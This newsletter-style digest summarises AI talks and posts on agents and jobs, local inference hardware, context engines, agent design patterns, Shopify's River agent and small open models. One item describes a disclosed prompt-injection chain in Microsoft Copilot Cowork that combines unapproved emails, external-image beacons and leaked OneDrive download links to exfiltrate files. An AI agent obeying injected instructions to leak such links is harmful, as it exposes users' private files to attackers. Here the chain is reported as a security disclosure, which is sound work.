To be blunt, work that we would usually do with people with master's and PhDs in finance over the course of weeks or months is being done by AI agents over the course of hours or days.
It's really, really unusual for the people building and selling a new technology to promise that it will destroy people's livelihoods.
Anthropic knows they are weeks away from AGI, which is why they are working with companies like Accenture, Deloitte, PWC, and others to build joint centers of excellence
the only mechanism for solving it in the short term is to use market forces, i.e. to raise the cost of tokens sufficiently so that all of the tokens that are available flow to the people who are most willing to pay for them
Drawing on Dan Shipper's "After Automation," the episode argues there's no tipping point where agents make work disappear — the more you automate, the more expert human work emerges, because AI commoditizes yesterday's competitive edge. It also maps the shift from "agents as employees" to the "human sandwich" collaboration model and the move from per-person autonomy toward shared team agents in harnesses like Codex and Claude Code.[10]The AI Daily Brief: Why Agents Still Need Humans
The host frames 2026 as the year agents became real, shifting the paradigm from prompt-wait-answer to spinning up and managing agents that produce work on your behalf ~00:00. He revisits his 'infinite backlog' concept: because agents don't get tired or stop, the only reason an agent isn't working is that you haven't given it something to do, so it feels like there's never an actual end to work ~02:02. This produces a new type of overwhelm — instead of finishing at 3pm, advanced users force themselves to bed at 3am ~02:02. Every CEO Dan Shipper's essay 'After Automation' is the centerpiece ~03:02: despite a ~30-person team using Codex and Claude Code across coding, writing, design, and customer service and alpha-testing every model from OpenAI, Anthropic, and Google, they have 'more human work to do than ever' and haven't fired employees in favor of agents ~04:04. Shipper notes AI has answered 95% of his work emails over recent weeks ~05:04. The episode cites the bear case directly: Dario Amodei's warning AI could wipe out half of entry-level white-collar jobs, Meta's 8,000-person layoff plus keystroke/mouse capture for training data, and Citadel's Ken Griffin calling these 'extraordinarily high-skilled jobs' being automated ~05:04. Shipper's counter-thesis: there's no tipping point coming; 'the more we automate, the more expert human work there is to do' because AI commoditizes the residue of human expertise — whatever can be made explicit and trained on — collapsing the value of default model output and creating demand for what's different ~06:05. The mechanism is a feedback loop: AI makes yesterday's competence cheap, cheap competence gets rapidly adopted (ops people writing PRs, marketers making YouTube thumbnails), abundance creates sameness, and sameness becomes 'slop' — defined not as em-dashes or sentence rhythm but as 'visible sameness repeated ad nauseam' ~12:06. 
Because models only know work that has been done while humans know what needs to be done right now, rare and valuable work must come from a human, so demand for difference is new demand for experts ~13:07.
There's no tipping point coming where things flip and the jobs are gone. The new reality is the opposite. The more we automate, the more expert human work there is to do.
Slop is not any one particular mistake... Slop is visible sameness repeated ad nauseam.
The current generation of models only knows about work that has been done. Humans know about what needs to be done right now at this moment.
Shipper describes two modes of working with agents. The first, well-predicted by AI discourse, is 'agents as employees': delegated co-worker agents that live in Slack (e.g. 'Andy,' the editorial team's agent that collects story 'nuggets' from Slack and drafts newsletter digests) and embedded agents inside product workflows (e.g. 'Fin,' embedded in their customer service platform, formerly Intercom, handling support via chat and email) ~07:05. The second, stranger and more important mode is human-agent collaboration in Codex, Claude Code, and Claude Cowork, which are becoming 'operating systems for the work itself' where humans and multiple agents share the same computer to do complex original work ~06:55. Both modes require a human to work well. The key framing is the 'human sandwich,' with humans as bread on either side of the AI's work: the human sets the frame and defines good, the AI collapses the task into drafts/searches/code/summaries, and the human judges and extends ('Is this good? Where does it belong? What should happen next?') ~08:05. The episode also documents Every's philosophy shift: initially every employee spun up a personal agent replica of themselves, but they found every broken agent had to be fixed by its owner, and a personal agent's value disappears if the employee leaves ~09:05. They moved to shared 'unit' agents (e.g. one shared analytics agent, updated once, benefits the whole team, versus updating 10 personal agents), an approach that retains company context and acts more like a chief of staff ~10:05. On the tooling-pattern front, the host notes OpenClaw's high-autonomy 'Mac Mini + Telegram + heartbeats' model burned tokens without accomplishing goals, which is costly in the emerging 'token shortage' era ~15:07.
He cites Matt Shumer wiping his OpenClaw Mac Mini to turn it into an always-on dev box for Codex Mobile, and OpenAI's Nick Bowman running Codex across a MacBook and Mac Mini connected as devices, kicking off and resuming threads from his phone with 24/7 heartbeat threads ~16:07. The recommended middle ground is reduced latency: using steering features and voice input to work semi-synchronously rather than turn-based or fully autonomous ~18:08. The episode closes with a markets read: Atlassian's stock soared 29% on 29% Q1 earnings growth from AI products despite earlier 10% layoffs, and Dan Ives warns companies against bragging about job cuts ('you just shot yourself in the foot'), arguing LLMs will commoditize and people/engineering/marketing will separate winners; Gartner projects AI will create more jobs than it eliminates even amid short-term layoffs starting 2028 ~20:09.
One of Dan's employees at Every calls this the human sandwich, with humans as the bread on either side of AI's work.
My biggest concern is tech companies tripping over their own shoelaces, talking about job cuts, not reading the room... You do that, you just shot yourself in the foot.
Agents are not a get out of budget jail free card but one of the best investment opportunities that companies have ever had.
Two contrarian-optimistic takes. Nate B Jones notes US productivity grew ~2.7% in 2025 (double the decade average) with AI agents a key driver, but only for people who restructure workflows around AI rather than dabbling with a chatbot. And the speaker on Lenny's Podcast argues that agents will multiply SaaS users and demand rather than kill SaaS, making those companies more valuable, not obsolete.[11]Nate B Jones: Are AI Agents Actually Boosting Productivity?[12]Lenny's Podcast: SaaS is actually here to stay
Citing a Financial Times report attributing part of 2025's ~2.7% US productivity growth (double the decade average) to AI agents, Nate distinguishes between passive chatbot use and genuine AI-driven workflow restructuring. The productivity winners are those treating AI as a primary collaborator — not waiting for better models but redesigning how they work. A concrete example contrasts two users of Claude: one who re-explains their context every session (4 minutes lost) versus one whose role, projects, constraints, and decisions are pre-loaded via an MCP server, enabling immediate high-quality collaboration.
The people getting those outsized results are not depending on better models to get there. They're actually restructuring how they work with AI as a primary collaborator.
You cannot collaborate with something that has no memory of you.
The speaker makes a bullish case for SaaS stocks and the category broadly, arguing that the feared 'SaaS apocalypse' from AI agents has not materialized. As evidence, they note that even as their own team uses tools like Codex heavily, their total SaaS spend continues to rise year-over-year. The key insight is that agents are consumers of SaaS, not replacements — they interact with SaaS products at high volume, effectively multiplying demand. This creates significant infrastructure and pricing challenges for SaaS companies, but the net effect is a major demand spike rather than displacement.
I would buy SaaS stocks right now. I think the SaaS apocalypse is done.
What agents do is increase the number of users of SaaS, not get rid of it.
EXO Labs' Alex Cheema argues frontier-quality inference will increasingly run on local, distributed consumer hardware — "not your weights, not your brain" — and demos clustering four Mac Studios over Thunderbolt 5 with RDMA (cutting inter-Mac latency ~100x) to run a trillion-parameter GLM 5.1, plus a heterogeneous Spark+MacBook prefill/decode split for up to ~4.8x speedups.[13]AI Engineer: Run Frontier AI at Home — Alex Cheema, EXO Labs
Cheema frames EXO Labs' mission as driving down the cost of running frontier AI locally, naming the company after "exocortex" and invoking Karpathy's "not your weights, not your brain" to argue against renting your cognition to a few centralized API providers ~02:16. He stresses the work is about inference, not training, and that the hardware lottery (Sara Hooker's idea) means today's Nvidia-data-center stack is optimized for training flops, leaving inference optimization underexplored ~05:17~06:17. Key distinction: training is compute-bound (flops), inference is memory-bound, especially locally where you run at low batch sizes, often batch size one ~10:18. Prefill is compute-bound and, he argues, matters less locally because good harnesses get high cache hits on largely-static system prompts; decode is the memory-bound bottleneck ~11:19. Decode depends on three things: fitting the model in memory, memory bandwidth, and energy cost per byte (in joules) ~12:20~13:20. He cites Stanford Hazy Research's "intelligence per watt" (better termed intelligence per joule), improving ~5x over two years from hardware and another ~3x from models, which compound ~15:20~17:23. Concrete numbers abound: a Qwen 3.5 local run was 50% slower than theoretical until EXO fused unnecessarily separate kernels for a 30% speedup ~07:17~09:17; phones draw ~10-15W against ~10-15Wh batteries, giving ~1 hour of runtime and overheating ~14:20; running trillion-parameter FP16 GLM 5.1 (~1.5TB) needs ~$40,000 of 512GB Mac Studios at only ~20 tok/s vs the ~50 tok/s people expect from cloud ~20:24~21:24; he predicts ~$5,000 near-frontier local boxes within ~18 months to 2 years via whole-stack co-design ~22:24~24:24. He sees use cases following S-curves with diminishing returns (Wispr Flow transcription, summarization), so ~90-99% of consumer tasks run locally while frontier compute handles hard problems ~27:32~28:33.
The hardware section contrasts Mac unified memory (e.g. 512GB Mac Studio at ~800 GB/s, 10x memory but ~half bandwidth and ~10x less compute) against an RTX 5090 (32GB GDDR7, ~1.5-2 TB/s); his answer is to use both, splitting prefill (compute-heavy, on Spark/GPU) from decode (bandwidth-heavy, on Mac) ~38:46~41:51. EXO is an app installed on every device that auto-discovers peers in a mesh, maintains a live physical topology, and figures out the best model distribution; remote access via Tailscale ~47:19~50:20. He argues batching makes cloud ~100x cheaper per unit, but local batching returns via multi-agent (Grok 4.20 running 4+ agents), test-time/search scaling (best-of-N, HuggingFace 1B model scaling), and especially continual learning / test-time training, which would break cloud batching entirely and make local ~10x more competitive ~52:23~55:25~57:29. The demo: four Mac Studios on Thunderbolt 5 (PCIe wrapper), with EXO's new low-latency RDMA cutting inter-Mac latency from ~300 microseconds to single-digit microseconds (~100x), critical because tensor parallelism needs 2 syncs per layer (~120 for a 60-layer model like Kimi) ~67:42~68:42~69:43. They ran a 4-bit ~400GB GLM 5.1 across the cluster (~112GB/machine), converted to MLX the day it shipped ~70:44~72:47. A heterogeneous Spark (ASUS, ~$4,000, 273 GB/s, 4x compute) + MacBook (546 GB/s) demo showed prefill-on-Spark / decode-on-MacBook streaming KV cache over 10GbE for ~2x (and up to ~4.8x on larger prompts) end-to-end speedup ~87:52~102:06. Cheema closes warning about Reddit/Twitter noise and "citizen scientist" claims (one-bit quantized or pruned models that look impressive but aren't usable) and is cynical about auto-research "slot machine" optimization without the scientific method; EXO plans to publish thousands of open benchmarks within a month, plotting a Pareto frontier of quality vs performance per dollar budget ~90:53~92:53~97:00.
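The latency point in the demo is easy to check with back-of-envelope arithmetic. The sketch below uses only the figures quoted above (2 syncs per layer, a 60-layer model, ~300 microseconds before RDMA); the 3-microsecond "after" value is an assumed stand-in for "single-digit microseconds", and the function names are illustrative, not part of EXO.

```python
def sync_overhead_ms(layers: int, syncs_per_layer: int, latency_us: float) -> float:
    """Time spent purely on inter-machine syncs for one decoded token, in ms."""
    return layers * syncs_per_layer * latency_us / 1000.0


def max_tokens_per_s(overhead_ms: float) -> float:
    """Upper bound on decode speed if sync latency were the only cost."""
    return 1000.0 / overhead_ms


# Figures from the talk summary: 60 layers, 2 syncs per layer, ~300 us per sync.
before_ms = sync_overhead_ms(60, 2, 300.0)
# Assumed value for "single-digit microseconds" after RDMA.
after_ms = sync_overhead_ms(60, 2, 3.0)

print(f"before RDMA: {before_ms:.2f} ms/token, ceiling {max_tokens_per_s(before_ms):.1f} tok/s")
print(f"after RDMA:  {after_ms:.2f} ms/token, ceiling {max_tokens_per_s(after_ms):.0f} tok/s")
```

Under these assumptions, sync latency alone costs about 36 ms per token before RDMA, which caps decode below 30 tok/s regardless of memory bandwidth; at a few microseconds per sync the overhead drops well under a millisecond and stops being the limiting factor.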
Not your weights, not your brain.
Our mission is to drive down the cost of running frontier AI systems locally.
We just did some pretty basic work to fuse that all together and increase the inference performance by 30%.
Training is about flops... but inference is mostly about memory.
Within 18 months, you'll be able to spend $5,000 and have close to frontier level performance running quite fast.
With RDMA, it's 100 times faster... single-digit microseconds.
If the whole model is changing, then you can't batch at all... local will get like 10x better relative to cloud.
What you should be renting out is the use case, right? You can go higher and higher up in the stack.
If you don't truly understand what's going on, then you might actually think you have a result... it's a slot machine.
You're better off focusing on the memory problem... why are you doing this with disk?
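Cheema's claim that decode is memory-bound can be turned into a rough ceiling: each generated token requires reading the weights it touches from memory, so tokens per second is at most bandwidth divided by bytes read per token. The sketch below is a simplified estimate, not EXO's scheduler. The bandwidth figures come from the summary above; the 20 GB per-token read size is a hypothetical example, and for mixture-of-experts models the bytes touched per token can be far smaller than the full model.

```python
def decode_tokens_per_s(bandwidth_gb_s: float, gb_read_per_token: float) -> float:
    """Bandwidth-bound ceiling on decode speed (ignores compute and sync costs)."""
    if gb_read_per_token <= 0:
        raise ValueError("gb_read_per_token must be positive")
    return bandwidth_gb_s / gb_read_per_token


GB_PER_TOKEN = 20.0  # hypothetical: weights touched per token, in GB

spark = decode_tokens_per_s(273.0, GB_PER_TOKEN)    # Spark: 273 GB/s (from the talk)
macbook = decode_tokens_per_s(546.0, GB_PER_TOKEN)  # MacBook: 546 GB/s (from the talk)

print(f"Spark ceiling:   {spark:.2f} tok/s")
print(f"MacBook ceiling: {macbook:.2f} tok/s")
print(f"MacBook / Spark: {macbook / spark:.1f}x")
```

Whatever the model size, the ratio between the two devices is fixed by bandwidth alone (546 / 273 = 2), which is consistent with routing decode to the MacBook and leaving compute-heavy prefill on the Spark.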
Unblocked's Brandon Walsenuk argues agent unreliability is a context problem, not an intelligence problem (quoting Karpathy: "the gap is not intelligence... it is context"), and that teams stop babysitting agents by building a "context engine" rather than leaning on naive RAG, more MCPs, or a bigger context window. A naive-MCP run compiled but missed a Bedrock fallback and broke callers; the context-engine run earned only a nitpick before merge.[14]AI Engineer: Stop babysitting your agents... — Brandon Walsenuk, Unblocked
Walsenuk frames every freshly spawned agent as a brilliant engineer with zero context about your org, so today the human has become 'the context engine' for their agents ~01:16. He maps an AI-adoption ladder (adapted from Basim Eld's work) where most teams are stuck at the 'you are the context engine' rung, and the goal is to climb to a 'curated context layer' ~02:17. Static repos of CLAUDE.md/AGENTS.md files and corporate context help but go stale and lack runtime data; a true context engine must combine static corpus, runtime signals across many SaaS systems of record, exhaustive reasoning, and a token-optimized small response to the agent ~03:17. Quoting Karpathy, 'the gap is not intelligence... it is context' ~04:17. He debunks three myths: (1) naive RAG over docs is not context because agents suffer 'satisfaction of search'—like a radiologist who stops scanning after the first finding, the agent grabs the first matching pattern and stops ~05:18~06:19; (2) connecting enough MCPs gives access but not understanding or cross-source reasoning ~06:19; (3) the 1M-token context window can't actually reason over a full window—no entities/relationships—and even 100M wouldn't solve more than needle-in-haystack ~07:20. A context engine instead needs a social/context graph as a pivot point (which codebases you work in, PR history, who you work with), conflict resolution (e.g., source code in main vs. a Slack thread where the CTO says it was implemented wrong—trust the CTO) ~08:20~09:21, permissions/governance delivered over MCP carrying the OAuth model (never surfacing others' private Slack/Teams chats) ~10:22, and token optimization ~11:22. He cites six differentiators: unified system context, targeted retrieval, conflict resolution, secure access model, personalized relevance/social graphs, and token optimization ~10:22~11:22. 
In a head-to-head demo prompt (build a Zendesk integration), the naive MCP-only run compiled and passed code checks but the senior engineer said it was totally wrong and would have broken the whole system (it missed that they use Bedrock as a fallback and broke custom callers); the context-engine run earned only a nitpick before merge ~05:18~11:22~12:22. Hard-won lessons: optimizing for access over understanding doesn't collapse into intelligence on its own; hiding conflicts instead of surfacing them is bad because agents just pick one; and caching 'good' answers for latency backfires because answers go stale within a 24-hour clock—like docs, they're invalid the moment you write them ~12:22~13:23. He pitches use cases beyond coding—an 'ask-engineering' Slack channel where the engine auto-answers scored-confident questions, ticket enrichment, triage, incident management ~13:23~14:24—and notes teams fork a cookbook of skills with their SOPs and custom agents. Closing thesis: an agent should write code that feels like it was written by someone on your team for years ~14:24. Demos: an open-source social-graph tool (to be released ~Monday) that procedurally generates an expert graph from your repo, sizing nodes by ship volume and showing who reviews/authors/works-with whom, using an Anthropic API key for labeling ~14:24~15:25~16:25; and a Ghostty terminal demo where the Unblocked MCP's research task tool wrote a query, ran high-effort reasoning, returned a research packet, triggered explore agents, and produced a strong plan (factory pattern, provider registration, library modules) ~17:25~18:26. Recommended pattern: use the engine for planning, run execution, then lean on it again for code review ~18:26.
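The conflict-resolution lesson (prefer the more authoritative source, but surface the disagreement instead of hiding it) can be sketched in a few lines. This is an illustrative toy, not Unblocked's implementation: the `Claim` type, the `AUTHORITY` ranking, and the source labels are all hypothetical.

```python
from dataclasses import dataclass

# Hypothetical authority ranking: higher wins when sources disagree.
AUTHORITY = {"docs": 1, "source_code": 2, "leadership_thread": 3}


@dataclass(frozen=True)
class Claim:
    topic: str
    statement: str
    source: str


def resolve(claims: list[Claim]) -> dict[str, dict]:
    """Pick a preferred claim per topic and keep the disagreeing ones visible."""
    by_topic: dict[str, list[Claim]] = {}
    for claim in claims:
        by_topic.setdefault(claim.topic, []).append(claim)

    results = {}
    for topic, group in by_topic.items():
        ranked = sorted(group, key=lambda c: AUTHORITY.get(c.source, 0), reverse=True)
        preferred = ranked[0]
        # Surface conflicts rather than silently dropping them.
        conflicts = [c for c in ranked[1:] if c.statement != preferred.statement]
        results[topic] = {"preferred": preferred, "conflicts": conflicts}
    return results


claims = [
    Claim("retry_policy", "retries three times with no backoff", "source_code"),
    Claim("retry_policy", "current retry logic is wrong; use backoff", "leadership_thread"),
]
answer = resolve(claims)["retry_policy"]
print(answer["preferred"].source, "| conflicts:", len(answer["conflicts"]))
```

Returning the losing claims alongside the preferred one lets the agent (or a reviewer) see that main and the Slack thread disagree, which is the behavior the talk argues for.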
Now what's weird is you are actually the context engine for your agents.
The gap is not intelligence at this point. It is context.
If it's not exhaustive it will not find the actual root cause.
If you cache a correct answer and then tomorrow someone asks the same question... you probably lied to them now because things probably changed in a 24-hour clock.
An agent should write code that feels like it was written by someone who's been on your team for years.
Studying four leading agents (Cursor, Claude, Harvey, Manifold), Mardu Swanepoel distills four shared patterns that make them effective: focus modes that constrain the action space, transparent execution that builds trust, personalization that optimizes for "speed to understanding," and reversibility that bounds the cost of mistakes so users attempt bolder tasks.[15]AI Engineer: What the Best Agents Share — Mardu Swanepoel, Flinn AI
Opening with Picasso's 'good artists copy, great artists steal,' Swanepoel reframes stealing as studying great agents deeply to build better ones ~00:07. He presents four patterns, covering for each what it is, the value it adds, and how it shows up in real products ~01:07. (1) Focus modes constrain the action and input space so engineers can drop tools, refine the system prompt, and optimize evals on a smaller surface, while also aligning user expectations; Cursor's mode dropdown is the example — planning mode writes no code and only asks questions, debug mode takes a hypothesis-driven approach with a dedicated debug server and logs [01:07–03:09]. (2) Transparent execution shifts delegation to collaboration by exposing the agent's thinking, tools, and tool-call inputs/outputs, which builds trust in the output and lets users intervene early to reduce waste; Claude's to-do/progress list plus visible context, skills, and tool calls, and Manifold's task progress, illustrate this [03:09–05:12].
(3) Personalization gives the agent the thoughts, systems, knowledge, and principles the user would apply themselves, optimizing for speed to understanding rather than just speed to outcome so the agent does the right thing and 'not just something' [05:12–07:14]. Examples include Harvey's playbooks (encoding a legal firm's contract-review methods), memory that accumulates across interactions, and Claude's skills/connectors [06:13–07:14]. (4) Reversibility lets users undo agent actions, bounding the cost of mistakes and making the ROI calculation easier, which encourages bolder, higher-value tasks; Cursor offers undo at line, file, and conversation-state granularity plus parallel multi-model outputs where the user keeps the best and discards the rest, and Harvey integrates with the native Microsoft Word API for change review/accept as an editor would [07:14–09:16].
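Two of these patterns, focus modes and reversibility, map onto simple data structures. The sketch below is a minimal illustration under stated assumptions: the mode names echo the Cursor example, but the tool names, the `MODES` table, and the `Workspace` class are hypothetical and do not describe any product's internals.

```python
# Focus modes: each mode exposes only a subset of tools (hypothetical names).
MODES = {
    "plan": {"ask_question", "read_file"},               # no code is written
    "debug": {"read_file", "read_logs", "run_tests"},    # hypothesis-driven
    "agent": {"read_file", "write_file", "run_tests"},
}


def allowed(mode: str, tool: str) -> bool:
    """A tool call is permitted only if the active mode lists it."""
    return tool in MODES[mode]


class Workspace:
    """Reversibility: every edit records the prior state so it can be undone."""

    def __init__(self) -> None:
        self.files: dict[str, str] = {}
        self._undo: list[tuple[str, str | None]] = []

    def apply_edit(self, path: str, new_text: str) -> None:
        self._undo.append((path, self.files.get(path)))
        self.files[path] = new_text

    def undo(self) -> bool:
        if not self._undo:
            return False
        path, old = self._undo.pop()
        if old is None:
            self.files.pop(path, None)  # the file did not exist before the edit
        else:
            self.files[path] = old
        return True


ws = Workspace()
ws.apply_edit("app.py", "v1")
ws.apply_edit("app.py", "v2")
ws.undo()
print(allowed("plan", "write_file"), ws.files["app.py"])
```

Because the worst case of any edit is one `undo()` call, the cost of a mistake is bounded, which is the property the talk credits with encouraging bolder tasks.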
Optimizing for speed to understanding... is really critical for agent to do the right thing and not just something.
If you were to actually share with me your process... we really use this process of transparency to build trust in the eventual outcome.
We're bounding the cost of our mistakes. So, if we know what the worst-case outcome is... it makes the ROI calculation much easier.
Shopify's internal coding agent River posts eye-watering numbers — 5,938 employees in 30 days across 4,400+ Slack channels, 1,800 PRs in one week, ~1 in 8 merged PRs — but the real story is the design choice: River only runs in public Slack channels, never DMs, and CEO Tobi Lütke uses it in the open. Nate B Jones reads this as the fix for a widening "apprenticeship gap": make AI work visible, especially senior work.[16]Nate B Jones: Shopify CEO Reveals Their Secret AI Developer
Shopify's internal coding agent is named River, and Tobi Lütke (Nate calls him 'Toby Licki') surfaced its usage stats earlier this month ~00:00. The headline numbers: in one 30-day stretch this spring, 5,938 Shopify employees used River across more than 4,400 Slack channels; in a single week River opened 1,800 pull requests in Shopify's main monorepo; and about one in every eight merged pull requests at Shopify now come from River ~00:00. Nate argues the numbers are not the story — the design choice is. River doesn't work in private: every engineer conversation with River happens in a public Slack channel where others can scroll back, see how a senior engineer scoped the task, what context she loaded, where the agent got stuck, what she rejected and what she kept ~00:00. A binding constraint enforces this — you cannot interact with River in a DM, it's literally not possible ~13:13~16:14. Tobi models it himself, treating himself as an individual contributor running his agent in a public channel and letting others question the agent and critique his choices ~11:11~12:12. Nate frames the corporate problem this is solving as visibility, not tooling: employees are already using ChatGPT, Claude, Copilot and coding agents all day, but it happens in private windows so the good prompt, the clever correction, and the working workflow disappear into one person's chat history and get rebuilt from scratch ~01:01. He cites talking to Amazonians who report six, eight, ten different vibe-coded tools for the same problem inside the company ~01:01. Net: individuals get smarter, the company does not.
About one in every eight merged pull requests at Shopify come from River today.
One of the ways that River works at Shopify is that you cannot interact with River in a DM. It's not possible.
Nate names the core problem the 'apprenticeship gap' ~03:02 — for most of history skilled work was learned by being near skilled workers, but when most actual thinking happens in a private chat window, juniors never see how seniors instruct agents, verify answers, or make corrections reusable ~03:02. He draws an analogy to manufacturing tacit knowledge (Polanyi's paradox, 'the work is more than we know'): John Deere-style PMs racing to capture retiring machinists' implicit skill into ML algorithms, and notes you can only approximate it — citing the lone person who paints racing stripes on a Rolls-Royce and a single machinist in Oregon who tests quality on a particular Boeing screw ~04:03~05:04. The prescription: make four parts of AI work visible — (1) the task, (2) the context fed to the model, (3) the interaction/prompting and pushback, and (4) the review (what was accepted, rejected, verified, rewritten and why) ~05:04~06:05. Nate stresses a prompt library is insufficient because it captures static instructions but misses messy context and revisions; he notes observers are surprised by how often and how quickly he says 'no' to the model based on rapid quality assessment ~07:07. He addresses the privacy objection directly: don't make private chats default company property or people stop using AI — instead create 'declared spaces and declared rules' ~08:07. Concrete channel ideas: a product team AI workbench, a sanitized customer-research channel for sales, a read-only finance analysis channel, public agent channels for non-sensitive engineering tasks ~08:07. Customer data, HR, and legal strategy stay private; regulated work (HIPAA, anonymized records) can be exposed thoughtfully without PII ~09:09~10:10. The biggest leverage comes from senior people running real, stakes-bearing work in public — because they have the most valuable judgment and the least visible process ~09:09~10:10. 
He recommends starting with one declared channel per team with a pinned charter for reusable workflows, useful failures and prompt revisions, then turning repeated patterns into playbooks/skills ~13:13. On measurement, he pushes beyond token volume toward learning/reuse metrics: how many reusable workflows created, how many adopted by another team, how many pinned, how much duplicated effort prevented, how many failures became better review rules — with the best signal sometimes being 'the mistake is happening less often' ~14:13. Closing takeaway: the real lesson is the power of creative, careful constraints (like 'no agents in DMs') to shape incentives toward collective public learning ~16:14.
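The "no agents in DMs" constraint is simple to express as a guard in a bot's event handler. The sketch below is hypothetical and says nothing about how River is actually built. It assumes an event dictionary with a `channel_type` field, loosely modeled on Slack message events, where direct messages are typed `"im"` and public channels `"channel"`.

```python
# Assumption: only public channels count as "in the open".
PUBLIC_CHANNEL_TYPES = {"channel"}

REFUSAL = "I only work in public channels so the team can learn from the thread."


def should_handle(event: dict) -> bool:
    """Accept a request only when it arrives in a public channel."""
    return event.get("channel_type") in PUBLIC_CHANNEL_TYPES


def respond(event: dict) -> str:
    """Run the task in public, or decline with an explanation."""
    if not should_handle(event):
        return REFUSAL
    return f"Working on: {event.get('text', '')}"


print(respond({"channel_type": "im", "text": "fix the flaky test"}))
print(respond({"channel_type": "channel", "text": "fix the flaky test"}))
```

Defaulting to refusal when the field is missing or unknown keeps the constraint binding instead of advisory, which is the design property Nate highlights.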
The prompt is the easy part to copy. The habit is what teaches us and helps us to learn.
What I'm describing is the opposite of that. I'm describing declared spaces and declared rules.
The best signal sometimes is not AI usage is up. The best signal sometimes is that the mistake is happening less often on our team.
Constraints that are creative and careful shape incentives toward learning.
Two sides of AI's security strain: the curl project is seeing a 4–5x surge in AI-generated vulnerability reports over 2024, piling operational and mental load on maintainers (still with zero severe findings) — and separately, Microsoft Copilot Cowork shipped a multi-stage hole that let attackers exfiltrate OneDrive files via prompt injection, unauthorized email, and image-based data leaks.[17]Simon Willison: The pressure[18]Simon Willison: Microsoft Copilot Cowork Exfiltrates Files
Simon Willison links to a post by Daniel Stenberg (curl's lead maintainer) describing how AI-assisted security tooling has driven security reports to 4-5x their 2024 rate and double the 2025 rate — more than one report per day on average. The reports are longer and more detailed than before, consuming substantial triage time and creating work-life balance stress Stenberg says he has never experienced before with the project.
Despite the volume and apparent quality of submissions, the actual security impact has been low: no HIGH or CRITICAL severity CVEs since October 2023, with all recent findings classified LOW or MEDIUM. This illustrates a systemic challenge for open-source maintainers — AI tooling lowers the cost of generating plausible-looking reports, flooding security teams regardless of whether genuine vulnerabilities exist.
This is a never-before seen or experienced pressure on the curl project and its security team members. An avalanche of high priority work that trumps all other things...
Simon Willison covers a security disclosure affecting Microsoft Copilot Cowork, an agentic AI product in Microsoft 365. The vulnerability chains three weaknesses together: (1) agents could send emails to a user's inbox without requiring explicit user approval; (2) those emails could contain external images that trigger network requests to attacker-controlled servers, enabling data exfiltration when the user opens the message; and (3) prompt injection attacks could cause the agent to leak pre-authenticated OneDrive download links, allowing attackers to download files directly.
Willison frames this as a representative example of the core design challenge for agentic AI systems — preventing agents from being weaponized to exfiltrate data when they operate over sensitive resources like email and cloud storage. The combination of lacking approval workflows, rendering untrusted external content, and exposing authenticated resource links created a complete attack path from prompt injection to file download.
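One link in that chain, external images acting as exfiltration beacons, can be illustrated with a small check that flags image URLs pointing outside a trusted host list before an agent-authored message is rendered. This is a generic sketch using Python's standard library, not Microsoft's fix; the host names and the `external_images` helper are hypothetical, and it does nothing about the approval or link-leak weaknesses.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class _ImgCollector(HTMLParser):
    """Collects the src attribute of every <img> tag."""

    def __init__(self) -> None:
        super().__init__()
        self.srcs: list[str] = []

    def handle_starttag(self, tag, attrs):
        if tag == "img":
            for name, value in attrs:
                if name == "src" and value:
                    self.srcs.append(value)


def external_images(html: str, trusted_hosts: set[str]) -> list[str]:
    """Return image URLs whose host is not explicitly trusted."""
    parser = _ImgCollector()
    parser.feed(html)
    parser.close()
    flagged = []
    for src in parser.srcs:
        host = urlparse(src).hostname  # None for cid: or relative references
        if host is not None and host not in trusted_hosts:
            flagged.append(src)
    return flagged


body = (
    '<p>Quarterly summary</p>'
    '<img src="https://attacker.example/p.png?d=secret">'
    '<img src="https://cdn.contoso.example/logo.png"/>'
    '<img src="cid:inline-logo">'
)
print(external_images(body, {"cdn.contoso.example"}))
```

A renderer could refuse to load, or strip, anything this returns; the query string in the first URL shows how data can ride out on an ordinary image request.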
these messages can contain external images that trigger network requests to external websites, data can be exfiltrated when a user opens a compromised message
preventing them from enabling attackers to exfiltrate data
Open and cheap keeps climbing: OpenBMB's MiniCPM5-1B tops the 1B-and-under open-weights leaderboard at 17.9 on the Artificial Analysis Intelligence Index, a 7.4-point lead over its nearest rival, while Alibaba's Qwen 3.7 Max posts frontier coding/agentic scores with a free 1M-token trial and pricing that undercuts the likes of Gemini Flash.[19]Artificial Analysis: MiniCPM5-1B: The leading 1B open weights model[20]AICodeKing: Qwen 3.7 Max (+Free API): WHY IS NO ONE TALKING ABOUT THIS!?
OpenBMB has released MiniCPM5-1B, a text-only language model with 1 billion parameters that achieves a score of 17.9 on the Artificial Analysis Intelligence Index, making it the top-ranked open-weights model at 1B parameters or below. It holds a 7.4-point lead over its nearest competitor, Qwen3.5 0.8B (Reasoning), which scores 10.5. Notably, it also outperforms Alibaba's larger Qwen3.5 2B (Reasoning, 16.3) by 1.6 points while using less than half the parameter count. MiniCPM5-1B improves upon its predecessor MiniCPM-V 4.6 1.3B by 5.3 points while using approximately 23% fewer parameters. The model features a 128K context window, Apache 2.0 licensing, and BF16 precision.
Token efficiency is a standout characteristic: the model required only 12.6 million output tokens for evaluation — approximately 31 times fewer than Qwen3.5 2B (Reasoning) and 8 times fewer than Qwen3.5 2B (Non-reasoning), though 2.3 times more than its predecessor. On the AA-Omniscience benchmark measuring hallucination resistance, MiniCPM5-1B scored -1 by declining to answer most uncertain questions rather than guessing, contrasting sharply with comparable models that score between -70 and -89 due to high hallucination rates. This combination of top benchmark performance, extreme parameter efficiency, and honest uncertainty handling positions MiniCPM5-1B as a notable advance for on-device and edge deployment scenarios.
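The headline figures above are internally consistent, which a few lines of arithmetic confirm. The sketch uses only numbers quoted in the summary and treats "1B" and "1.3B" as nominal parameter counts; the derived values (predecessor score, other models' token usage) are implied by the stated ratios, not separately reported.

```python
score = {"MiniCPM5-1B": 17.9, "Qwen3.5 0.8B (R)": 10.5, "Qwen3.5 2B (R)": 16.3}

lead_over_nearest = round(score["MiniCPM5-1B"] - score["Qwen3.5 0.8B (R)"], 1)
lead_over_2b = round(score["MiniCPM5-1B"] - score["Qwen3.5 2B (R)"], 1)

# Predecessor score implied by the stated 5.3-point improvement.
implied_predecessor_score = round(score["MiniCPM5-1B"] - 5.3, 1)

# Parameter reduction from a nominal 1.3B to a nominal 1.0B, in percent.
param_reduction_pct = round((1.3 - 1.0) / 1.3 * 100)

# Output tokens (millions) implied by the stated ratios to MiniCPM5-1B's 12.6M.
tokens_m = 12.6
implied_2b_reasoning_m = round(tokens_m * 31, 1)
implied_2b_nonreasoning_m = round(tokens_m * 8, 1)
implied_predecessor_tokens_m = round(tokens_m / 2.3, 1)

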